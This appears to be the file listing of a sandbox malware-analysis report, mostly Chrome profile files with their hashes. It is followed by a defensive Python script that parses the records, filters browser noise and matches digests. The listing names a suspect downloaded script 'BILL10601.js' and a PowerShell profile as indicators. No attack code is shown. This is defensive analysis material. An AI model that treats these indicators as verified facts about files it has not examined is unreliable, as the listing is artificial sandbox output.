SHA256 d3c59060e591b3839ec59cad150c0a38a2a2a6ba4cc4dc5530f68be54f14ef1d
SHA512 58840a773a3a6cb0913e6a542934daecaef9c0eeab626446a29a70cd6d063fdb012229ff2ccfa283e3c05bc2a91a7cac331293965264715bdb9020f162dc7383

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 e0f9152da09ebe96e08f982330446c46
SHA1 f40f49d30853353dde867f547c8f083effb54a61
SHA256 9c89c7be3004d8c2cf3bd22bb4929491827d92493e39b924532eb0c1beb37654
SHA512 ef9f167fe285406f75c853aaa48e8577e385b41ef63e73a22ee8e873eacd47f88ff2695d6c2e45b827a3af17765414fd208cdd02974f2234a7f278fbad19d8c1

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index

MD5 e8cd02639f81f7ee78fd38ea913cb3ac
SHA1 153677fcc48e0da173b58e90c9f49dc07be3006e
SHA256 d3bc96dcb94847d3d9252f8f36b211db5271b2d81708c07d013cfb13325d29eb
SHA512 3ff4b159120488292f287c044f16419c5354ffc9e01652316ef75c503e521d9405109fdb1506cf01b5350823e1f9e9f251376dd0bb3d0965a154328e10ae6576

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 efbcd47e5b4ea74392e8d1afb6a011e4
SHA1 813c43ad574576da64216082e0b5a7b325c11f76
SHA256 73a16f6b9cfdbef0b7ae8e973658b5560eadcfda768c8392bed0d89e4b76eb8d
SHA512 0b666e3c55fa1bb9ac9a09aed5b2d8f29dc04a37a638c43aaf710826bb6573c6b554a69fab241ee70eb386933596c3f01eb5875f18ba99e880bd4008d7656e0b

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

MD5 e11efed4b086c7a21e4aee961b9c84a8
SHA1 0efc5f453079fa0171b133863726f0fb38224885
SHA256 94f23e6bd76c4674148bb2f13356b269b9f37f5ce3a1a3352f39119c354c1c60
SHA512 f6be84a23598940fceef4443bda6d8fcee9c5c37a08c5b3e4638af08ede877b650aeff34615afed43da83498a7e4f622287b7d5813aed59a5e71e405248ba2c7

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000024

MD5 322ec754f369b14aa8898467033c49a4
SHA1 c6d01ad92e6e8a7e4a61a656f2bc931f1a5994cb
SHA256 a20310738269ab7907af99cf6abaaf81a876fd59dd36d9ccbd8fdbd4407489df
SHA512 6b2f26ba17a1a9172acacf71d8b69743f866579da7dde85789b2984e5d618c57d872fabd41f487b217c2d4b10409853fa2a03e3b77c9cdfd4ebb2ad313631b0b

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\IndexedDB\https_www.virustotal.com_0.indexeddb.leveldb\CURRENT

MD5 46295cac801e5d4857d09837238a6394
SHA1 44e0fa1b517dbf802b18faf0785eeea6ac51594b
SHA256 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443
SHA512 8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 dce49bcb1233b3d04163036f590a3318
SHA1 71c9028b62ded32b239e084f6e912a67931022ee
SHA256 72f1a73eaee25e659528e568be496221e9c238a399300d4dcf7cc9036f47fee7
SHA512 4a5666350bea34ed9c4b2f9207001b62794de363075ca0c9fe524f4d4f6bd97dd1d9ae161d1f80354e850cd69dbc09a09c2f85e24abd95f4dd8b0cc4eccb51c1

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000017

MD5 b692a5ec0bbe28b36076a86330f23e23
SHA1 ed59107df6aea7186a39585f93fd633ef10219ba
SHA256 12a717367af287b090030c6136c673990ea4366c7a76eb7161e17f3b2ef0733a
SHA512 eec1bebf899d67205d7b4bb206e9434fea1379665f7c31c55e099a331ad5f33669fb0ce4b31444798f8d3268a6b472f6a725257daae50c0d82b96c46fdf7b968

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_00001a

MD5 9cabf7f1b4cedb0b2014b08af077c2f4
SHA1 2754934cdd7af3787e7357e5ed2194947d3b1847
SHA256 4168b1e05f0cfe3949190cbeda35343ee0d92092b913649194fde3ece66a69ca
SHA512 2b7318ded7d2ea579e435beb82121e976b2a1e921adc24de58cf03a4fe136be4d8632919488629a9468365209da5a33284a2c857796fc711e236b891bf7a6f81

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000015

MD5 eed13e0404f75114261f93a8418ff234
SHA1 fb3e43f5cb48a0f926ae2eeeea16b91af408642e
SHA256 2fc3edcb175bd0f7dfb95d67a7c7b5f20e93e11d3b488e983536c9e52cc6649a
SHA512 9dcab9ad574115e7c3592f4c15b92775c46ec5d1e19a3aa2dbd327e14ce326ee9ac8b573e00f3a1e2dea980abdbaaf9eaba70e92ff7c8aebf4f26eebae71cc05

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_00001b

MD5 39d9e504c3f2e522f314f283ce811fa2
SHA1 0c65d11c3ea3e35dedfc95f5bab7e3c02bd327ee
SHA256 2a158c39adfcb1b0b52e3191717efe1d3b61fd01b3921cbf913fa440ba5f8e8d
SHA512 fd1a82471982cdf44da617f594f6b52db9c7434752a73275c1093e18e76d38d2d117ba5e280cc36ba3d0e5db4656e93047cb56175145663de35c33ebd558da5b

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000016

MD5 8ddcda52567dc657a4e1baf16a663f40
SHA1 fe5929f2396cd8f5fc7eb133249034828b3d94b1
SHA256 ca66d373252161cbabfbffa981e98200372beaf1000ec9766887cd9dcdd5baf8
SHA512 4d0c499fd860f99295677db7a7ec975b3e17a2c07d6bc0e5c67d6c5f7c1cec5a9c5e8b82ec6ce9847e3034cd1eee8a9997c885f7606b1a79e4dc485c3f66b4c3

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000014

MD5 bc6180d2d0825c67f2515cd954df2ddf
SHA1 a025568b8031a37ccddec5c3aeaa2e3c43e4da34
SHA256 76eb7c70aa3e44ad78f2f34271110bd0285ce5436251cf9df32a685337d47f93
SHA512 e8bde99b5401870c1cf721c95415a1f27209cb38b78d6807a84d32f6f98ad1d704cade1b8aab7252e181f5045448b78556c5ad1e9fe4227efcd8c9bf14cc789f

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_00001c

MD5 b4311631998b7b01b2da50630a55be1b
SHA1 f7dad800a3a42d3fc8cf9bfb289e76d393199b66
SHA256 1f3e1356cbaf2bd75542cac464b99ec212940fa1d0f4687a19c340a91e60e33f
SHA512 d59b71c11b4b58123d1b6d60e9efad89679f751de40bd3b439a9e0c541da1253c3d0751caad13246cf8346805ea7368ebf71457e64819e1fa26374920f90eef9

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_00001e

MD5 87e8230a9ca3f0c5ccfa56f70276e2f2
SHA1 eb116c8fd20cb2f85b7a942c7dae3b0ed6d27fe7
SHA256 e18d7214e7d3d47d913c0436f5308b9296ca3c6cd34059bf9cbf03126bafafe9
SHA512 37690a81a9e48b157298080746aa94289a4c721c762b826329e70b41ba475bb0261d048f9ab8e7301e43305c5ebf53246c20da8cd001130bf156e8b3bd38b9b8

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000019

MD5 18d10cfbd0bebd886365d2a936ff6f45
SHA1 bd3db53eed808181733f773f289194cedac17c9b
SHA256 098eccaa7ca1a5aa74c368c9b50c34138be7d9fa4a15012703fb5b8e453494cc
SHA512 6fa3fb29e6cd89a224145df4c2de8657b6ef3df2f5dfc0aa82b5962a66950473d7c3bba4fe6e5cd12d8cb1a4b4333969dd61bae5f00b5ab712b32f141fd58164

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000021

MD5 687838138d4fa6b2ab1dca174572e91c
SHA1 bff4c0c861a26ed168aed3246ece7170294adcb3
SHA256 fd47bc48fd99d3347c2bfa45a4b214650d04bc79e1773a54317bc30c01397895
SHA512 f883e7f66fdf1960dd90a8d2552036aab35fe6aadfbe7ec9211d54bd76945761dcf596077205b1762359159d81ab112e95ba7b6629340c645155af43714d6901

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000022

MD5 53436aca8627a49f4deaaa44dc9e3c05
SHA1 0bc0c675480d94ec7e8609dda6227f88c5d08d2c
SHA256 8265f64786397d6b832d1ca0aafdf149ad84e72759fffa9f7272e91a0fb015d1
SHA512 6655e0426eb0c78a7cb4d4216a3af7a6edd50aba8c92316608b1f79b8fc15f895cba9314beb7a35400228786e2a78a33e8c03322da04e0da94c2f109241547e8

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\198b1dbef7ece2ad03770a72810f2b485859f245\de6247bb-b6f2-4c17-a299-f8ff9999fa00\index-dir\the-real-index

MD5 d8c462b8fac93389b88fb7ea21add5cc
SHA1 8af6161108984f0f330fcf2c66f2c17a45cada50
SHA256 f066fe2c9d13b5685b3e5b92cd4d7d2234c70f695af953a9687dec4c587fb6b4
SHA512 103f278fa1f54a4032bd3b9b0de5a8e8301f87171281ada94b5e8bc82f7f89987d07a3c008460b43ec29eecafbb1d897c6ffe689b6640215a8bf5a7d11bdc76c

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\198b1dbef7ece2ad03770a72810f2b485859f245\de6247bb-b6f2-4c17-a299-f8ff9999fa00\index-dir\the-real-index~RFe5c1034.TMP

MD5 58feab59b926a601b0ec6b4ef62b0bce
SHA1 ebee42d48d14c68027042f50bb871f6143afd6b1
SHA256 b791fc671469de6affce5e1e098177873fdf49c1a714d2d6dfafc73162846040
SHA512 f8697323e09b57643a44786358665b235d50e9d8cd89e642a117ede67a1f13920ba6f1d5c5ba6b842cd188bd2b082f3efa51d95c49e2512e816e762a8d6738ef

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\198b1dbef7ece2ad03770a72810f2b485859f245\index.txt

MD5 61403f13fd0e1b1a5ccdf09bfa97433e
SHA1 19103517980cd4f18487e14072ba2bdc38fd845f
SHA256 000764fc36162a8eff1771b2eae431f0da1053a3aa20d5b5b92ed02b4fe6a3e7
SHA512 f302ff586f619ea5374168beedb9406b3f033fbe860457a5f7f06a9f28dfeb8a6fe024ba5fd0ac27e68103de53d3ddbcc3973cfe20f76bbe33f5b8c1c2bfb0b4

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\198b1dbef7ece2ad03770a72810f2b485859f245\index.txt

MD5 98369035e0a9f351e3b57614a438e24f
SHA1 5b5390237ec728f9f658e1da618dcb55f5fac5ae
SHA256 5d96a8700680389bf1410f73062b0bfc4c3043523b5059c7dd83474f638c2f21
SHA512 64288586d833562050c8e7c30d3128c69a087b577243849c9b83a944709f292ab56a27c14b4f8a158575b1abd00f729b7c43bd069aeb9a057758b37ea9498172

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

MD5 d113c32bdfb28d4c3f59ae74219c3c81
SHA1 a9455f56231d33c62030c026c56a573ba20dcb5e
SHA256 4c15de26e42538a7c598f3bf6d1e1aad9efb85d5ec56ac0a7bbca59a5b1b298c
SHA512 5bbad0dbb8bc27ccc039d0c5a7e7b87ed1b10c939c7a28eec5492eb5269754917ee237b7956c41c7fac02ea234586964047711851cfd332603e6fe1fbc86a578

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 5314261d9a72b6c026eeab471101d734
SHA1 e732834fa0e9d40cf7e4d19bda3e4ecd0f161bdb
SHA256 147a025704e4bbe54ddfaec8d2a68e65d44a8a6aaddafec14aee2c61f81b56a8
SHA512 b70fa32bde5456679a0f62a748e0a8b6c77fac293d5e93d1181f372d2638b1580ad091e62c7557874b2d6819d52829c43eacb8e6818902e18d78bcf84576c1fc

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000028

MD5 28f4f0bebddc1f73bbfc64ff19c55cbc
SHA1 3278808cd91f47b84ea46658026e92eaf0ca1334
SHA256 903829488d400803f9af057a3534477c09f828bae97146b900796e176c3d3e5d
SHA512 e73e5cefd5b3d1c54aacfd0355c372dd106ac674e48d3d532ca123db22ab4398f6ecc5012150e0ad347ff9a3c5b23a373069cfdd16a4031c9fcef6b280d06ffd

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000027

MD5 607c72c3be13bbffde239ea082f4fb7a
SHA1 82a6d49ef9cd35aa9a6b84e8785ce7823ee7f397
SHA256 55ce4d01717b172d2c97b78cbc31c05f2f2761d1bf6580f1fb975be1b83cddc5
SHA512 07307805e9fe98cd95cd1528d2fecd7ca105c70cae3abf2a4edfabf340d96f6d9d249dddc826d93dfdf21b3a4ba820989c3226e5df46d2a09eeb7ed915aec890

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000026

MD5 6fce7132b851c4f1ee4a7953379188ac
SHA1 4da9f5254c72016940ea8054ae74a2746dd38fc6
SHA256 9d5ab5b8b6dda08585680da14dbebc124e3f26b4f4c6d880f3ef72468926a070
SHA512 c38dd5854df7aa85ac4cfe7d995bf08bdf4145fe3a56b8a6485329371fc3772770971eca0fa714d94323aec901b1c718e706ea1730db190cc7706ac8a397a1cc

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000029

MD5 f084380a374ec96f9a7ea820213681ee
SHA1 47e0c281dd21db61eb3b66bde243bbcfd749168e
SHA256 8e1af56a04e2ba48e2121a8e9b11491507eac2b3646a6180061e5f453439b91c
SHA512 a80100647358f018fe3653f2672b9dd3ce18514b10de6fbb5e24bb7586f8ddb38ae59ac0942fe308e71ecc4bf9664e4c10052977a47e2942755f78e6f8f31b0b

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000025

MD5 f4b52fe03c46995859299c3200a0c166
SHA1 ea09311b2ca05be6ea3d06f2c19d30a83b982381
SHA256 4382c3e361672d4c87ee5f39a9f19eaa126c23fd7d03a517d5f86c0183c34377
SHA512 9a2d5926788631c587cdf618dbec2cdde07cdc3020553143be7c359b9cc01a892b0b3141e1218d65f94c147449ee1e183d72f9043b32e9215c488d1299b98edb

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 891105b065760513bba251357bdef47d
SHA1 7036f9dcf30193c7168d3e5b0483fcfdb6da71fb
SHA256 a5b8c569ccea8860cd59f785c92949c9b64af8a51d6ba8e59fd910261714dfa3
SHA512 dacb66a0d490e22e48d4c05e789011382a2d3d10441305dfa18bfe3237535ad73122a13748a10ff8e2f7e159f2751d5d41bacc11a24ae443aad867d817fae3d8

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 5ea5dffc2c8b6c9b802ffc39441477ae
SHA1 13e167fa81d9987f334723c04ffc068e5c6f54ad
SHA256 62ad35599e6a7c0cb6237325a5bcd6d61ab32dd06911406af7c53bf3228848a4
SHA512 cc027b8bcb31977d294dfe1e5cd7464f666910bad0edd11a4b03e7f9a96b25e687d604447466b5698178718baa0a42cff4bccfb67ca35218836d5a9b216b2b5f

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 ec296718ac1ec2a312f0e196c5ace389
SHA1 79d9983511788770206ba4035d1cee67f253103d
SHA256 cdb0285855df1a43bae0eb474f3257e5567c616c805d8b79b6a0746cb14db6b6
SHA512 0b20394834be6880e83348d82dd60ca0ea824bf8f69dd35d6d23eab56a0d57c3ce32be0c6464638666b4a489f0f72ef8618e0f6a502c45d18eab54ce13700de6

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

MD5 849ff2f19c7ff2a6fbdb4f33f645e5b1
SHA1 79ea2a55f6fc8cab8755f9cc7289a09bfc0e3e2a
SHA256 cd91a528196f8a4b701c23a81b4efdad52ab8956e33b468504e6853975c598fe
SHA512 71980f6f41c0ef3dd9b144552375ac367fb4053e8d6a2f9babda9fb212e771173d657dbe725267a8b58299f1565095c9a6a3a029d06e1937a840da704da6c22a
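The listing above is raw sandbox output: a path line, then MD5/SHA1/SHA256/SHA512 lines, with memory dumps carrying no digests at all. Nearly every entry is Chrome profile bookkeeping (Local State, Preferences, Cache_Data, the-real-index, Network Persistent State) that is rewritten on every detonation and is useless as an indicator; the entries outside the browser profile in this span are the file in the user's Downloads folder (BILL10601.js) and a PowerShell startup profile cache. The Python below is an added example, not part of the report or of the sandbox that produced it: it parses this exact format, separates browser-profile noise from the rest, and matches locally computed digests against the records, comparing on the strongest algorithm both sides share because MD5 and SHA1 are collision-prone. The embedded REPORT_EXCERPT is copied from the records above; the path-prefix noise heuristic and all function names are this example's own choices.

```python
"""Triage helpers for the 'Files' listing of a sandbox report.
Added example: REPORT_EXCERPT is copied from the report; the parser, the
noise heuristic and the function names are this example's own."""
import hashlib
import re
from dataclasses import dataclass, field

# Report format: a path line, then zero or more "<ALGO> <hexdigest>" lines.
HASH_RE = re.compile(r"^(MD5|SHA1|SHA256|SHA512)\s+([0-9a-fA-F]+)$")
HEX_LEN = {"MD5": 32, "SHA1": 40, "SHA256": 64, "SHA512": 128}

# Routine browser bookkeeping in a Chrome-launched detonation, plus memory
# dumps that carry no digests. Heuristic chosen for this example.
NOISE_PREFIXES = (
    "C:\\Users\\Admin\\AppData\\Local\\Google\\Chrome\\User Data\\",
    "memory/",
)


@dataclass
class FileRecord:
    path: str
    hashes: dict = field(default_factory=dict)  # algo -> lowercase hex

    def is_noise(self) -> bool:
        return self.path.startswith(NOISE_PREFIXES)


def parse_file_records(text: str) -> list:
    """Each non-blank, non-hash line starts a record; hash lines attach to the
    most recent record. Hash lines before any path belong to a record cut off
    above the excerpt and are skipped. A digest of the wrong length (truncated
    copy/paste) raises instead of silently never matching anything."""
    records = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        m = HASH_RE.match(line)
        if m:
            if not records:
                continue
            algo, value = m.group(1), m.group(2).lower()
            if len(value) != HEX_LEN[algo]:
                raise ValueError(f"{algo} on {records[-1].path}: {len(value)} hex chars")
            records[-1].hashes[algo] = value
        else:
            records.append(FileRecord(path=line))
    return records


def actionable(records) -> list:
    """Records worth blocklisting or pivoting on: not browser-profile noise."""
    return [r for r in records if not r.is_noise()]


def digests(data: bytes) -> dict:
    """All four digests the report uses, keyed like FileRecord.hashes."""
    return {
        "MD5": hashlib.md5(data).hexdigest(),
        "SHA1": hashlib.sha1(data).hexdigest(),
        "SHA256": hashlib.sha256(data).hexdigest(),
        "SHA512": hashlib.sha512(data).hexdigest(),
    }


def hash_file(path: str) -> dict:
    with open(path, "rb") as fh:
        return digests(fh.read())


def match(records, local: dict) -> list:
    """Paths whose digests agree with `local`. The strongest algorithm present
    on both sides decides; MD5/SHA1 agreement does not count when a stronger
    shared digest disagrees, and records without digests never match."""
    hits = []
    for r in records:
        for algo in ("SHA512", "SHA256", "SHA1", "MD5"):
            if algo in r.hashes and algo in local:
                if r.hashes[algo] == local[algo]:
                    hits.append(r.path)
                break
    return hits


# Copied verbatim from the report's Files listing (four consecutive records).
REPORT_EXCERPT = r"""
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

MD5 b8b3127141eba7886f9382265f21031d
SHA1 b441491812d9bfb8e09b200b73a0781270d252d3
SHA256 a67bbc810a4559dbdf9306c0359c9bf8f4e44754ceba02847fe7bce99a34bfc8
SHA512 fbb7e6db37866d9bdf3d86bae3b56ee9c0b0dba1a2e6e63a08f219a65a41d2b524f492ddccb75f52c5aa44768d1211104016444c1f0b8de3b5a15f79057ea233

C:\Users\Admin\Downloads\BILL10601.js

MD5 997a390731bd37d78eb278dc658de51e
SHA1 7ff93505df93a026de413a0a4bb355150a09394f
SHA256 2f992a6af255696edf8f8d6567493d22e7e0691b2c3fb344d8fe52f42e117e8e
SHA512 fd0cba5dd336ed0d04e9bd1f216067f249e21038e94fa3d626eedc1a4572158c8bceb75fc9676e2b0056646de08b83755c710e2d0431459935a3e54482971985

memory/3368-654-0x00007FFC81A90000-0x00007FFC8247C000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 48d3880f8c9ca895241252b3a1056389
SHA1 5f9d986f6511f6cc0441c3a6ab1cf0fe3e7b406e
SHA256 647cd7795578d653e2656b07c0478b782e020e10444d8487ac7804010e222e79
SHA512 e971367b50dd97d3362fa683fcbbe1d9b47782b3ba95bfd5c22b3753c2b275c0b9cb9b527559c6e25cd2877d082661f9b87397cfa3dff6f6316e1b8861b285ac
"""

if __name__ == "__main__":
    for rec in actionable(parse_file_records(REPORT_EXCERPT)):
        print(rec.path, rec.hashes.get("SHA256"))
```

In practice, run parse_file_records over the complete Files section rather than this excerpt, and feed hash_file() of a suspect file into match(). The noise filter is deliberately a prefix list: Chrome's profile files change on every run, so their digests never belong in a blocklist, while anything outside the browser profile (here the Downloads and PowerShell entries) is what gets pivoted on and shared.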